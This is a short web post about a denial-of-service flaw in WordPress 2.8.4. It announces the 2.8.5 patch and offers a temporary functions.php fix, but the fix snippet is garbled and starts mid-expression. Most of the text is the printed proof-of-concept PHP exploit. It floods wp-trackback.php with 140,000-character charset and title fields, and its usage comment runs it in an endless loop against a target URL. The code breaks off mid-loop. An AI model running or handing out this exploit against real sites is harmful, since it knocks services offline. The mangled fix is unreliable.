This exploit has been patched in the new 2.8.5 version of WordPress. Download it at: http://wordpress.org/download/
If you are running WordPress 2.8.4 there is an exploit out there that will allow someone to DOS your site.
Here is a TEMPORARY fix until there is an official update from WordPress:
Copy this code into your theme’s functions.php file. If there isn’t a file called functions.php create one.
50 ) { die; } } } } add_action('init','ft_stop_trackback_dos_attacks'); ?>
Here is the proof of concept code (i.e. the exploit) DO NOT put this in your functions.php:
<?php /* * wordpress Resource exhaustion Exploit * http://rooibo.wordpress.com/ * [email protected] contacted and get a response, * but no solution available. * * [18/10/2009 20:31:00] modified by Zerial http://blog.zerial.org * * exploiting: * you must install php-cli (command line interface) * $ while /bin/true; do php wp-trackbacks_dos.php http://target.com/wordpress; done * */ if(count($argv) < 2) die("You need to specify a url to attackn"); $url = $argv[1]; $data = parse_url($url); if(count($data) < 2) die("The url should have http:// in front of it, and should be complete.n"); $path = (count($data)==2)?"":$data['path']; $path = trim($path,'/').'/wp-trackback.php'; if($path{0} != '/') $path = '/'.$path; $b = ""; $b = str_pad($b,140000,'ABCEDFG').utf8_encode($b); $charset = ""; $charset = str_pad($charset,140000,"UTF-8,"); $str = 'charset='.urlencode($charset); $str .= '&url=www.example.com'; $str .= '&title='.$b; $str .= '&blog_name=lol'; $str .= '&excerpt=lol'; for($n = 0; $n